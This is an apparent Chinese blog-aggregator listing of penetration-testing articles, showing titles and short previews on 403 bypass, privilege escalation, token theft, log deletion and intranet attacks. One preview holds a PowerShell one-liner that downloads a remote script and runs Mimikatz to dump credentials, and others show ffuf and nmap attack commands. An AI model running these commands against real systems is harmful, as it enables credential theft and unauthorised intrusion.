渗透技巧

渗透技巧之403绕过【总结】

文章目录渗透技巧之403绕过【总结】0x01前言0x02背景1.什么是网页403?2.什么是403绕过?
gaynell·2023-12-06 17:07

渗透技巧之403绕过_指纹识别

403绕过清单FFUF路径模糊测试ffuf-w403_url_payloads.txt-uhttp://example.com/auth_pathFUZZ-fc403,401,400HTTP标头模糊测试ffuf-w403_bypass_header_names.txt:HEADER-w403_bypass_header_values.txt:VALUE-uhttp://example.com/au
NL0ck_S·2023-10-10 16:12

渗透技巧】资产探测及信息收集

一、前言在众测中,基本上SRC的漏洞收集范围有如下几种形式:形式一:暂时仅限以下系统:www.xxx.com,其他域名不在此次测试范围内形式二:只奖励与*.xxx.com相关的漏洞形式三:无限制形式一,基本被限定了范围形式二,注重于子域名的收集形式三,子域名及相关域名的收集另外,随着企业内部业务的不断壮大,各种业务平台和管理系统越来越多,很多单位往往存在着“隐形资产”,这些“隐形资产”通常被管理员
hacker鬼七·2023-09-25 17:51

从 Admin 权限切换到 System 权限

渗透技巧——从Admin权限切换到System权限0x00前言在渗透测试中,某些情况下需要用到system权限,例如操作注册表HKEY_LOCAL_MACHINESAMSAM恰巧最近看到了一篇文章介绍了几种获得
老白_·2023-08-25 06:39

渗透测试面试、渗透技巧

一、思路流程1、信息收集a、服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等)b、网站指纹识别(包括,cms,cdn,证书等),dns记录c、whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等)e、子域名收集,旁站,C段等f、googlehacking针对化搜索,pdf文件,中间件版本,弱口令扫描等g、扫描网站目录结构,爆后台,网站banner,测试文件,备份等敏感
艾欧尼亚归我了·2023-03-29 11:19

渗透测试面试问题2021版,内含大量渗透技巧

目录思路流程信息收集漏洞挖掘漏洞利用&权限提升清除测试数据&输出报告复测问题1.拿到一个待检测的站,你觉得应该先做什么?2.判断出网站的CMS对渗透有什么意义?3.一个成熟并且相对安全的CMS,渗透时扫目录的意义?4.常见的网站服务器容器。5.mysql注入点,用工具对目标站直接写入一句话,需要哪些条件?6.目前已知哪些版本的容器有解析漏洞,具体举例。7.如何手工快速判断目标站是windows还是
渗透测试老鸟-九青·2022-07-05 09:55

2021Web安全面试题大全(附答案详解)看完稳了

另外我还整理了许多关于Web安全的学习资料+工具包等等,需要的点击Web安全学习一、渗透测试面试题,包含大量渗透技巧1.拿到一个待检测的站,
大明湖畔的九青·2021-10-13 11:42

rsync的几则tips(渗透技巧

关于rsyncrsync(remotesynchronize)——Linux下实现远程同步功能的软件,能同步更新两处计算机的文件及目录。在同步文件时,可以保持源文件的权限、时间、软硬链接等附加信息。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员;而开发人员安全意识薄弱、安全技能欠缺往往是导致rsync出现相关漏洞的根源。rsync默认配置文件为/etc/rsyncd.conf,
Coisini、·2020-09-11 08:54

渗透技巧——Token窃取与利用

作者:print("")分类:信息安全发布时间:2018-06-0217:21编辑0x00前言在之前的文章《渗透技巧——程序的降权启动》介绍了使用SelectMyParent降权的方法,本质上是通过token
weixin_30312557·2020-09-10 18:14

内网渗透----Token 窃取与利用

0x00前言在之前的文章《渗透技巧——程序的降权启动》介绍了使用SelectMyParent降权的方法,本质上是通过token窃取实现的。
浅笑⁹⁹⁶·2020-08-25 07:22

红蓝对抗之域名搜集方法总结

最近我们三人加入腾讯蓝军学习渗透技巧,导师让我们对域名资产收集方式做一次全面梳理研究。
腾讯安全应急响应中心·2020-08-25 06:59

【内网渗透】域渗透技巧 => 第三方工具API

前言域管理进程转移,使得渗透测试人员能够模拟在互联网上的域名管理员账户进行操作。尽管如此,在渗透测试开始之前需要确认系统中进程是否运行。在这篇博文中,我讲介绍5个技巧来帮助大家去做这些事情。本地检测查询活跃的域控制器扫描远程系统上运行的任务扫描远程系统上NetBIOS信息PSExec扫描远程系统上的身份验证令牌获取域名管理员权限在大多数情况下,本篇文章关注的焦点在于识别运行于域名管理进程的系统。以
qq_27446553·2020-08-13 16:04

BT5中MSF很强大的一个工具

Byadmin¶Postedin入侵渗透技巧¶Leaveareply综合扫描服务器的软件MSF(在线攻击)msfconsole进入db_nmap-TAggressive-sV-n-O-vIP(调用nmap
小-龟·2020-08-10 01:51

LINUX渗透与提权总结

本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍。
weixin_34255793·2020-08-09 00:38

各种提权、渗透经验技巧总结大全(下)

liunx相关提权渗透技巧总结,一、ldap渗透技巧:1.cat/etc/nsswitch看看密码登录策略我们可以看到使用了fileldap模式2.less/etc/ldap.confbaseou=People
netsec_steven·2020-08-08 18:08

Linux渗透技巧+实战

一.ldap渗透技巧1.cat/etc/nsswitch看看密码登录策略我们可以看到使用了fileldap模式2.less/etc/ldap.confbaseou=People,dc=unix-center
god_7z1·2020-08-08 15:25

渗透技巧——Windows日志的删除与绕过

本文讲的是渗透技巧——Windows日志的删除与绕过,0x00前言在渗透测试过程中,Windows日志往往会记录系统上的敏感操作,如添加用户,远程登录执行等。
weixin_34160277·2020-07-12 09:52

渗透技巧总结

旁站路径问题1、读网站配置。2、用以下VBSOnErrorResumeNextIf(LCase(Right(WScript.Fullname,11))="wscript.exe")ThenMsgboxSpace(12)&"IISVirtualWebViewer"&Space(12)&Chr(13)&Space(9)&"Usage:CscriptvWeb.vbs",4096,"Lilo"WScrip
bit小兵·2020-07-10 07:11

渗透技巧:Windows平台运行Masscan和Nmap

本文讲的是渗透技巧:Windows平台运行Masscan和Nmap,0x00前言在内网渗透中,信息搜集尤为重要。
weixin_34185364·2020-07-08 17:01

VMware Workstation 中安装metasploitable 2

用于练习渗透技巧,了解主机漏洞。
xyyz..·2020-07-06 11:55

内网渗透技巧

通过powershell运行mimikatzpowershell"IEX(New-ObjectNet.WebClient).DownloadString('http://is.gd/oeoFuI');Invoke-Mimikatz-DumpCreds"获取hash之后,解出明文密码将目标机器共享盘映射到本地的h盘netuseh:\\ip\c$"密码"/user:"用户名"注意,映射盘对方也可以看到
mirror97black·2020-07-05 00:00

渗透技巧】资产探测及信息收集

一、前言在众测中,基本上SRC的漏洞收集范围有如下几种形式:形式一:暂时仅限以下系统:www.xxx.com,其他域名不在此次测试范围内形式二:只奖励与*.xxx.com相关的漏洞形式三:无限制形式一,基本被限定了范围形式二,注重于子域名的收集形式三,子域名及相关域名的收集另外,随着企业内部业务的不断壮大,各种业务平台和管理系统越来越多,很多单位往往存在着“隐形资产”,这些“隐形资产”通常被管理员
Bypass--·2020-07-02 16:59

web狗日记之Vulnhub-five86-2

主要考察:1、wpcms渗透技巧2、Wpcms插件漏洞的使用3、流量捕获以及分析4、Linux提权Vulnhub官网速度感人,朋友给了这个站点,下载比较快点:http://five86.com/five86
传说中的彩虹海·2020-06-29 13:59

总结16种网站渗透技巧经验分享

1.利用网站过滤不严直接绕过后台验证,在网站后面加上admin/session.asp或admin/left.asp2.有的网站进后台会出现一个脚本提示框,输入:administrator即可突破!因为admin代表以管理员身份进入的意思。3.有的网站开了3389,入侵之前先去连接3389,尝试弱口令或是爆破,再者就是按5次shift键,看看有没前人装过后门,然后再社工密码。4.有时候进后台会弹出
weixin_30633949·2020-06-27 22:30

渗透技巧——获得Powershell命令的历史记录

0x00前言我在最近的学习过程中,发现Powershell命令的历史记录有时会包含系统敏感信息,例如远程服务器的连接口令,于是我对Powershell的历史记录功能做了进一步研究,总结一些渗透测试中常用导出历史记录的方法,结合利用思路,给出防御建议。0x01简介本文将要介绍以下内容:·两种Powershell命令的历史记录·导出Powershell命令历史记录的方法·防御建议0x02两种Power
systemino·2020-06-26 17:36

各种渗透,提权的经验和技巧总结(中)

liunx相关提权渗透技巧总结,一、ldap渗透技巧:1.cat/etc/nsswitch看看密码登录策略我们可以看到使用了fileldap模式2.less/etc/ldap.confbaseou=People
eudemon_cn·2020-06-23 06:32

【PHP渗透技巧拓展】————2、利用 Gopher 协议拓展攻击面

1概述Gopher协议是HTTP协议出现之前,在Internet上常见且常用的一个协议。当然现在Gopher协议已经慢慢淡出历史。Gopher协议可以做很多事情,特别是在SSRF中可以发挥很多重要的作用。利用此协议可以攻击内网的FTP、Telnet、Redis、Memcache,也可以进行GET、POST请求。这无疑极大拓宽了SSRF的攻击面。2攻击面测试2.1环境IP:172.19.23.218
FLy_鹏程万里·2020-06-21 20:36

2017年9月3日——周总结

学WAF又去了解了IPS,学了IPS又去了解了防火墙,了解防火墙的同时又去了解了渗透技巧。杂乱无序,没有规划,学习效果自然很差。原因出自哪里
FKTX·2020-03-07 07:25

渗透技巧--通过cmd上传文件的N种方法

渗透技巧--通过cmd上传文件的N种方法1.debugdebug是一个程序调试工具,功能包括:(win7以上版本好像没有)直接输入,更改,跟踪,运行汇编语言源程序观察操作系统的内容查看ROMBIOS的内容观察更改
Bugl0v3r·2020-03-05 00:59

我的渗透装备

@[渗透技巧,yoyoyang]终级渗透BOSSPentestBox(windows)kalilinuxChromeF12,打开开发者工具,功能==Firebug+本地存储观察等SwitchSharp插件
yo_哥·2020-02-19 17:22

获取IIS网站路径技巧

渗透技巧最近在渗透一个网站的时候,网站是windowsserver2003+aspx+IIS6搜索处存在盲注,用sqlmap跑的时候只能跑出数据库跑不出表,原谅菜鸡只会用工具。
D0be·2020-02-06 00:48

内网渗透实战技巧

代理域信息收集内网主机信息收集内网存活主机探测内网存活主机端口扫描内网存活主机服务探测内网横向渗透攻击技巧MS17-010CVE-2019-0708psexec攻击哈希传递攻击MS14-068本文章是关于内网方面渗透技巧的一个
谢公子·2020-01-02 10:54

渗透技巧——通过Cmd上传文件的N种方法

本文由三好学生原创并首发于乌云drops,转载请注明0x00前言在渗透测试的过程中,常常需要向目标主机上传文件,我在最近的学习测试过程中就碰到了这个问题,要求只能通过cmdshell向目标主机(Windows系统)上传文件,所以本文就对该技巧做一下总结。0x02测试环境OS:Win7x86testexe:ssss2.exe,成功运行后输出10x03通用上传方法1、Debugdebug是一个程序调试
K7_淡年华·2019-12-30 19:20

windows渗透技巧

文章目录一,命令行下载方法二,搜索指定文件路径和☞dir三,查看进程的方法☞tasklist四,绕过杀软,离线读密码五,使用windows-kernel-exploits脚本提权一,命令行下载方法1.powershell下载2.ftp3.写脚本(马),菜刀连接4.bitsadmin5.certutil二,搜索指定文件路径和☞dirdir/b/sXXXXcd/dE:&&dir/b/sXXXXX指定在
冗长·2019-10-21 19:04

Linux渗透与提权:技巧总结篇

本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍。
Coisini、·2019-06-23 19:00

【PHP渗透技巧拓展】————1、php 伪协议

最近php伪协议的各种神奇妙用好像突然又常常提到了,php中支持的伪协议有下面这么多file://—访问本地文件系统http://—访问HTTP(s)网址ftp://—访问FTP(s)URLsphp://—访问各个输入/输出流(I/Ostreams)zlib://—压缩流data://—数据(RFC2397)glob://—查找匹配的文件路径模式phar://—PHP归档ssh2://—Secur
FLy_鹏程万里·2019-01-26 22:49

[渗透技巧] 干货分享--渗透测试工具实战技巧合集

本文为作者总结自己在渗透测试中常用的一些小技巧。原文分为两部分,译者将其合二为一,方便大家查阅。最好的NMAP扫描策略#适用所有大小网络最好的nmap扫描策略#主机发现,生成存活主机列表$nmap-sn-T4-oGDiscovery.gnmap192.168.56.0/24$grep"Status:Up"Discovery.gnmap|cut-f2-d''>LiveHosts.txt#端口发现,发
qq_27446553·2016-09-17 17:18

Redrain:黑客都是金字塔顶端的人

个人简介洪宇(Redrain),6年网络安全学习经历,擅长各种主流、非主流的网站渗透技巧。自主挖掘过大量互联网企业漏洞,拥有丰富的网络安全实战经验,并获得过百度,腾讯,阿里等企业的致谢。
InfoQ·2016-06-24 00:00

渗透技巧——通过cmd上传文件的N种方法三好学生 · 2016/04/05 10:23

0x00前言在渗透测试的过程中,常常需要向目标主机上传文件,我在最近的学习测试过程中就碰到了这个问题,要求只能通过cmdshell向目标主机(Windows系统)上传文件,所以本文就对该技巧做一下总结。图片来自于http://www.telegraph.co.uk/news/worldnews/northamerica/usa/11754089/Hacker-remotely-crashes-Je
qq_27446553·2016-04-12 23:00

渗透技巧——通过cmd上传文件的N种方法

渗透技巧——通过cmd上传文件的N种方法三好学生·2016/04/0510:230x00前言在渗透测试的过程中,常常需要向目标主机上传文件,我在最近的学习测试过程中就碰到了这个问题,要求只能通过cmdshell
citelao·2016-04-08 08:32

渗透技巧——如何巧妙利用PSR监控Windows桌面

0x00前言在渗透测试的过程中,如果需要获取主机的更多信息,相比于键盘记录,记录系统屏幕的操作往往更加直接有效。也许每个人都有自己独特的实现方式,但是如果能够利用Windows系统自带的程序实现,个人认为绝对是最优先考虑的方案。下面就介绍一下如何利用Windows系统自带的功能实现监控屏幕操作。0x01简介PSR(ProblemStepsRecorder),直译为问题步骤记录器,在Windows早
qq_27446553·2016-03-29 15:00

渗透技巧篇--关于安全狗的一些看法

   安全的攻与防一直永不过时的话题。    正如你渗透的某个网站,也许某一刻因为各种技术条件限制,你无法很好对其进行渗透,但是随着自己的成长以及研究。总会有些意想不到的小惊喜在等着你。    上一周,自己手上有不少的任务,所以前三天是论坛上的,后两天则去做自己手头上的事情。在渗透一个网站的时候,发现了一个数字型的注入点,正准备利用的时候。Duang,安全狗弹出来了。    那天手上的任务不算太多
qq414207614·2015-12-20 22:28

渗透技巧篇--关于安全狗的一些看法

   安全的攻与防一直永不过时的话题。    正如你渗透的某个网站,也许某一刻因为各种技术条件限制,你无法很好对其进行渗透,但是随着自己的成长以及研究。总会有些意想不到的小惊喜在等着你。    上一周,自己手上有不少的任务,所以前三天是论坛上的,后两天则去做自己手头上的事情。在渗透一个网站的时候,发现了一个数字型的注入点,正准备利用的时候。Duang,安全狗弹出来了。    那天手上的任务不算太多
qq414207614·2015-12-20 22:28

rsync的几则tips(渗透技巧

转自91ri 关于rsync rsync(remote synchronize)——Linux下实现远程同步功能的软件,能同步更新两处计算机的文件及目录。在同步文件时,可以保持源文件的权限、时间、软硬链接等附加信息。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员;而开发人员安全意识薄弱、安全技能欠缺往往是导致rsync出现相关漏洞的根源。 rsync默认配置文件为/etc
·2015-11-02 16:42

LINUX渗透与提权总结

本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍。
·2015-10-31 18:47

渗透测试的一些总结

今天听了大牛们的各种讲解,心里感触特别深刻,作为一名渗透新手,我总结一些渗透技巧   1、  原理是关键   你可以看这些书,务必仔细的阅读,只有深刻理解才能成为大牛
·2015-10-31 13:31

黑客运用SQL Injection做数据库的渗透

如何灵活地运用SQL Injection做数据库渗透的一种思路 如今,很多关于mssql数据库的渗透技巧已不能有效地获取有用的数据值。
·2015-10-23 08:36

黑客运用SQL Injection做数据库的渗透

如何灵活地运用SQL Injection做数据库渗透的一种思路 如今,很多关于mssql数据库的渗透技巧已不能有效地获取有用的数据值。
·2015-10-23 08:36

黑客运用SQL Injection做数据库的渗透

如何灵活地运用SQL Injection做数据库渗透的一种思路 如今,很多关于mssql数据库的渗透技巧已不能有效地获取有用的数据值。
·2015-10-21 12:48

【内网渗透】域渗透技巧 => 第三方工具API

前言域管理进程转移,使得渗透测试人员能够模拟在互联网上的域名管理员账户进行操作。尽管如此,在渗透测试开始之前需要确认系统中进程是否运行。在这篇博文中,我讲介绍5个技巧来帮助大家去做这些事情。本地检测查询活跃的域控制器扫描远程系统上运行的任务扫描远程系统上NetBIOS信息PSExec扫描远程系统上的身份验证令牌 获取域名管理员权限在大多数情况下,本篇文章关注的焦点在于识别运行于域名管理进程的系统。
qq_27446553·2015-05-14 10:00
上一页 1 2 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他